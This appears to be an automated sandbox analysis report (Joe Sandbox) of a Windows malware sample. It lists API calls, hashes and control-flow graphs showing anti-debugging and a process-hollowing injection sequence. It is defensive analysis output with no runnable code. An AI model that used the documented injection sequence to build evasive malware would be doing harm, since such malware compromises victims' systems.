            • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
            • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
            • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
            APIs
            • _memset.LIBCMT ref: 0042419D
            • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: DebuggerPresent_memset
            • String ID: i;B
            • API String ID: 2328436684-472376889
            • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
            • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
            • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
            • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
            APIs
            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
            • ___raise_securityfailure.LIBCMT ref: 0042AC7A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: FeaturePresentProcessor___raise_securityfailure
            • String ID: 8Q
            • API String ID: 3761405300-2096853525
            • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
            • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
            • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
            • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
            APIs
            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
              • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
            • _memset.LIBCMT ref: 00413C83
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
            • String ID: vector<T> too long
            • API String ID: 1327501947-3788999226
            • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
            • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
            • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
            • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _fputws$CreateDirectory
            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
            • API String ID: 2590308727-54166481
            • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
            • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
            • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
            • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
            APIs
            Strings
            • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: __calloc_crt
            • String ID: Assertion failed: %s, file %s, line %d
            • API String ID: 3494438863-969893948
            • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
            • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
            • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
            • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
            APIs
            • _memset.LIBCMT ref: 00480686
              • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
            Strings
            • .\crypto\evp\digest.c, xrefs: 00480638
            • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset_raise
            • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
            • API String ID: 1484197835-3867593797
            • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
            • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
            • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
            • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
            APIs
            • std::exception::exception.LIBCMT ref: 0044F251
              • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
            • __CxxThrowException@8.LIBCMT ref: 0044F266
              • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
            • String ID: TeM
            • API String ID: 757275642-2215902641
            • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
            • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
            • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
            • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

            Execution Graph

            Execution Coverage:1.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:38
            Total number of Limit Nodes:8
            execution_graph 33583 2230000 33586 2230630 33583->33586 33585 2230005 33587 223064c 33586->33587 33589 2231577 33587->33589 33592 22305b0 33589->33592 33595 22305dc 33592->33595 33593 22305e2 GetFileAttributesA 33593->33595 33594 223061e 33595->33593 33595->33594 33597 2230420 33595->33597 33598 22304f3 33597->33598 33599 22304fa 33598->33599 33600 22304ff CreateWindowExA 33598->33600 33599->33595 33600->33599 33601 2230540 PostMessageA 33600->33601 33602 223055f 33601->33602 33602->33599 33604 2230110 VirtualAlloc GetModuleFileNameA 33602->33604 33605 2230414 33604->33605 33606 223017d CreateProcessA 33604->33606 33605->33602 33606->33605 33608 223025f VirtualFree VirtualAlloc Wow64GetThreadContext 33606->33608 33608->33605 33609 22302a9 ReadProcessMemory 33608->33609 33610 22302e5 VirtualAllocEx NtWriteVirtualMemory 33609->33610 33611 22302d5 NtUnmapViewOfSection 33609->33611 33614 223033b 33610->33614 33611->33610 33612 2230350 NtWriteVirtualMemory 33612->33614 33613 223039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33615 22303fb ExitProcess 33613->33615 33614->33612 33614->33613 33617 2190026 33618 2190035 33617->33618 33621 21907c6 33618->33621 33623 21907e1 33621->33623 33622 21907ea CreateToolhelp32Snapshot 33622->33623 33624 2190806 Module32First 33622->33624 33623->33622 33623->33624 33625 219003e 33624->33625 33626 2190815 33624->33626 33628 2190485 33626->33628 33629 21904b0 33628->33629 33630 21904f9 33629->33630 33631 21904c1 VirtualAlloc 33629->33631 33630->33630 33631->33630

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02230156
            • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0223016C
            • CreateProcessA.KERNELBASE(?,00000000), ref: 02230255
            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02230270
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02230283
            • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0223029F
            • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022302C8
            • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022302E3
            • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02230304
            • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0223032A
            • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02230399
            • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022303BF
            • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022303E1
            • ResumeThread.KERNELBASE(00000000), ref: 022303ED
            • ExitProcess.KERNEL32(00000000), ref: 02230412
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
            • String ID:
            • API String ID: 93872480-0
            • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction ID: 042f9b1f5519f0a29cdff44598482e68cd4ded503f62d28b93d3b5dc57d2bf83
            • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction Fuzzy Hash: DDB1C8B4A00209AFDB44CF98C895F9EBBB5FF88314F248158E509AB395D771AE41CF94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 15 2230420-22304f8 17 22304fa 15->17 18 22304ff-223053c CreateWindowExA 15->18 19 22305aa-22305ad 17->19 20 2230540-2230558 PostMessageA 18->20 21 223053e 18->21 22 223055f-2230563 20->22 21->19 22->19 23 2230565-2230579 22->23 23->19 25 223057b-2230582 23->25 26 2230584-2230588 25->26 27 22305a8 25->27 26->27 28 223058a-2230591 26->28 27->22 28->27 29 2230593-2230597 call 2230110 28->29 31 223059c-22305a5 29->31 31->27
            APIs
            • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02230533
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: CreateWindow
            • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
            • API String ID: 716092398-2341455598
            • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction ID: d37a774ead6614570d6b84c39d373adf135c78591b99f502d8b920ff24636611
            • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction Fuzzy Hash: 1A511870D083C8DAEB12CBE8C849BDDBFB2AF11708F144058D5447F28AC3BA5659CB66

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 32 22305b0-22305d5 33 22305dc-22305e0 32->33 34 22305e2-22305f5 GetFileAttributesA 33->34 35 223061e-2230621 33->35 36 2230613-223061c 34->36 37 22305f7-22305fe 34->37 36->33 37->36 38 2230600-223060b call 2230420 37->38 40 2230610 38->40 40->36
            APIs
            • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022305EC
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: AttributesFile
            • String ID: apfHQ$o
            • API String ID: 3188754299-2999369273
            • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction ID: 2f5e3c6283aee8237482d8ccdc7fd5ff8a87dc116c159cd3de1ad9a84b72d24c
            • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction Fuzzy Hash: 430121B0C0425DEEDF15DBD8C5183AEBFB5AF41308F1480D9C4092B245D7B69B59CBA1

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 41 21907c6-21907df 42 21907e1-21907e3 41->42 43 21907ea-21907f6 CreateToolhelp32Snapshot 42->43 44 21907e5 42->44 45 21907f8-21907fe 43->45 46 2190806-2190813 Module32First 43->46 44->43 45->46 51 2190800-2190804 45->51 47 219081c-2190824 46->47 48 2190815-2190816 call 2190485 46->48 52 219081b 48->52 51->42 51->46 52->47
            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021907EE
            • Module32First.KERNEL32(00000000,00000224), ref: 0219080E
            Memory Dump Source
            • Source File: 00000005.00000002.2271495369.0000000002190000.00000040.00000020.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2190000_file.jbxd
            Yara matches
            Similarity
            • API ID: CreateFirstModule32SnapshotToolhelp32
            • String ID:
            • API String ID: 3833638111-0
            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction ID: 28cbf0a576c958c714c493ad2518e1ad2ad554dc95a7ff95d947838c862a8b22
            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction Fuzzy Hash: 0EF062316407146FDB203BB5A88DBAF76F8AF4D625F100528E642910C0DB70E8458A61

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 54 2190485-21904bf call 2190798 57 219050d 54->57 58 21904c1-21904f4 VirtualAlloc call 2190512 54->58 57->57 60 21904f9-219050b 58->60 60->57
            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021904D6
            Memory Dump Source
            • Source File: 00000005.00000002.2271495369.0000000002190000.00000040.00000020.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2190000_file.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction ID: 6d6090c701d62a9204606a492d4507b785b8c98c5a42170e653f1325f5497908
            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction Fuzzy Hash: E9113C79A40208EFDB01DF98C985E99BBF5AF08350F058094F9489B361D371EA90DF90

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 551 2256437-2256440 552 2256466 551->552 553 2256442-2256446 551->553 554 2256468-225646b 552->554 553->552 555 2256448-2256459 call 2259636 553->555 558 225646c-225647d call 2259636 555->558 559 225645b-2256460 call 2255ba8 555->559 564 225647f-2256480 call 225158d 558->564 565 2256488-225649a call 2259636 558->565 559->552 568 2256485-2256486 564->568 570 22564ac-22564cd call 2255f4c call 2256837 565->570 571 225649c-22564aa call 225158d * 2 565->571 568->559 580 22564e2-2256500 call 225158d call 2254edc call 2254d82 call 225158d 570->580 581 22564cf-22564dd call 225557d 570->581 571->568 589 2256507-2256509 580->589 586 2256502-2256505 581->586 587 22564df 581->587 586->589 587->580 589->554
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
            • String ID:
            • API String ID: 1442030790-0
            • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
            • Instruction ID: 25790a7977ede88272a57e704731bc47d5bc405687dfbe85b4c25106b1e011c1
            • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
            • Instruction Fuzzy Hash: 31219F35134771AAE7317FE5D805E2B7BEADF41760BA0C029EC49550ACEB328960CE91

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 595 2253f16-2253f2f 596 2253f31-2253f3b call 2255ba8 call 2254c72 595->596 597 2253f49-2253f5e call 225bdc0 595->597 606 2253f40 596->606 597->596 602 2253f60-2253f63 597->602 604 2253f65 602->604 605 2253f77-2253f7d 602->605 608 2253f67-2253f69 604->608 609 2253f6b-2253f75 call 2255ba8 604->609 610 2253f7f 605->610 611 2253f89-2253f9a call 2260504 call 22601a3 605->611 607 2253f42-2253f48 606->607 608->605 608->609 609->606 610->609 613 2253f81-2253f87 610->613 619 2254185-225418f call 2254c9d 611->619 620 2253fa0-2253fac call 22601cd 611->620 613->609 613->611 620->619 625 2253fb2-2253fbe call 22601f7 620->625 625->619 628 2253fc4-2253fcb 625->628 629 2253fcd 628->629 630 225403b-2254046 call 22602d9 628->630 632 2253fd7-2253ff3 call 22602d9 629->632 633 2253fcf-2253fd5 629->633 630->607 636 225404c-225404f 630->636 632->607 640 2253ff9-2253ffc 632->640 633->630 633->632 638 2254051-225405a call 2260554 636->638 639 225407e-225408b 636->639 638->639 650 225405c-225407c 638->650 642 225408d-225409c call 2260f40 639->642 643 2254002-225400b call 2260554 640->643 644 225413e-2254140 640->644 651 225409e-22540a6 642->651 652 22540a9-22540d0 call 2260e90 call 2260f40 642->652 643->644 653 2254011-2254029 call 22602d9 643->653 644->607 650->642 651->652 661 22540d2-22540db 652->661 662 22540de-2254105 call 2260e90 call 2260f40 652->662 653->607 658 225402f-2254036 653->658 658->644 661->662 667 2254107-2254110 662->667 668 2254113-2254122 call 2260e90 662->668 667->668 671 2254124 668->671 672 225414f-2254168 668->672 673 2254126-2254128 671->673 674 225412a-2254138 671->674 675 225413b 672->675 676 225416a-2254183 672->676 673->674 677 2254145-2254147 673->677 674->675 675->644 676->644 677->644 678 2254149 677->678 678->672 679 225414b-225414d 678->679 679->644 679->672
            APIs
            • _memset.LIBCMT ref: 02253F51
              • Part of subcall function 02255BA8: __getptd_noexit.LIBCMT ref: 02255BA8
            • __gmtime64_s.LIBCMT ref: 02253FEA
            • __gmtime64_s.LIBCMT ref: 02254020
            • __gmtime64_s.LIBCMT ref: 0225403D
            • __allrem.LIBCMT ref: 02254093
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022540AF
            • __allrem.LIBCMT ref: 022540C6
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022540E4
            • __allrem.LIBCMT ref: 022540FB
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02254119
            • __invoke_watson.LIBCMT ref: 0225418A
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
            • String ID:
            • API String ID: 384356119-0
            • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
            • Instruction ID: 814692f06624a1ad1155d859876ebc06eee1a40dfbfbd8a01aeda6d2f92bb356
            • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
            • Instruction Fuzzy Hash: FC71CE72A20727ABD714EEF9CC41B6AB3B5BF10364F14C165ED14D6694E770D980CB90

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
            • String ID:
            • API String ID: 3432600739-0
            • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
            • Instruction ID: 3b8ff45f270b0a2daa355efd1bf6791405a89bff1f33c60a3586cd813fb8a706
            • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
            • Instruction Fuzzy Hash: 13412432920325EFDB10AFE4D840BAE7BFAAF04324F50C42DED1456198CB799584DF51

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 744 22584ab-22584d9 call 2258477 749 22584f3-225850b call 225158d 744->749 750 22584db-22584de 744->750 756 2258524-225855a call 225158d * 3 749->756 757 225850d-225850f 749->757 752 22584e0-22584eb call 225158d 750->752 753 22584ed 750->753 752->750 752->753 753->749 769 225855c-2258562 756->769 770 225856b-225857e 756->770 759 2258511-225851c call 225158d 757->759 760 225851e 757->760 759->757 759->760 760->756 769->770 771 2258564-225856a call 225158d 769->771 775 2258580-2258587 call 225158d 770->775 776 225858d-2258594 770->776 771->770 775->776 778 2258596-225859d call 225158d 776->778 779 22585a3-22585ae 776->779 778->779 782 22585b0-22585bc 779->782 783 22585cb-22585cd 779->783 782->783 785 22585be-22585c5 call 225158d 782->785 785->783
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free$ExitProcess___crt
            • String ID:
            • API String ID: 1022109855-0
            • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
            • Instruction ID: 6eaa5a7cfbb61b83915a2a22d9c7f68fc08472d25186fa528371280da1ac1146
            • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
            • Instruction Fuzzy Hash: D831D135910371EBDB21AF94FC8095977A6FB14334315C62AEE08572A8CBF059C9AF92
            APIs
            • std::exception::exception.LIBCMT ref: 0227FC1F
              • Part of subcall function 0226169C: std::exception::_Copy_str.LIBCMT ref: 022616B5
            • __CxxThrowException@8.LIBCMT ref: 0227FC34
            • std::exception::exception.LIBCMT ref: 0227FC4D
            • __CxxThrowException@8.LIBCMT ref: 0227FC62
            • std::regex_error::regex_error.LIBCPMT ref: 0227FC74
              • Part of subcall function 0227F914: std::exception::exception.LIBCMT ref: 0227F92E
            • __CxxThrowException@8.LIBCMT ref: 0227FC82
            • std::exception::exception.LIBCMT ref: 0227FC9B
            • __CxxThrowException@8.LIBCMT ref: 0227FCB0
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
            • String ID: leM
            • API String ID: 3569886845-2926266777
            • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
            • Instruction ID: 03bfddb943f90b9568e11bbb4932e08b51cf76f511314d289763fff2e4c0e2a7
            • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
            • Instruction Fuzzy Hash: 30111C79C0030DBBCF04FFE5D459CEDBB7DAA04340B508566AD1897244EB74A3988F94
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free_malloc_wprintf$_sprintf
            • String ID:
            • API String ID: 3721157643-0
            • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
            • Instruction ID: 0a5368b189060816aa5de5eaaf0aae83e35cf49c823aa83d005aacfa3277b1cf
            • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
            • Instruction Fuzzy Hash: E3113AB69207707AC26262F91C11FFF3BDD9F45711F040169FE8CE1184DA385A1497B1
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_memset$_malloc_sprintf
            • String ID:
            • API String ID: 65388428-0
            • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
            • Instruction ID: 2c10fc2236181a231923708a1e3be375810fb4f736066c2e94e18a9b43bd0662
            • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
            • Instruction Fuzzy Hash: BD517D71D40219ABEB11DBE1DC85FEFBBB9FF04704F100025F909B6294EB746A118BA5
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_memset_sprintf
            • String ID:
            • API String ID: 217217746-0
            • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
            • Instruction ID: d13dbb241e13fc976d0fb73ec078e24dbcd2cac6488ff1d9a1d7537de60f7c41
            • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
            • Instruction Fuzzy Hash: 8E51AFB1D50249EAEF11DFE1DD46FEEBB79FB04704F204025F905B6184E7B4AA058BA4
            APIs
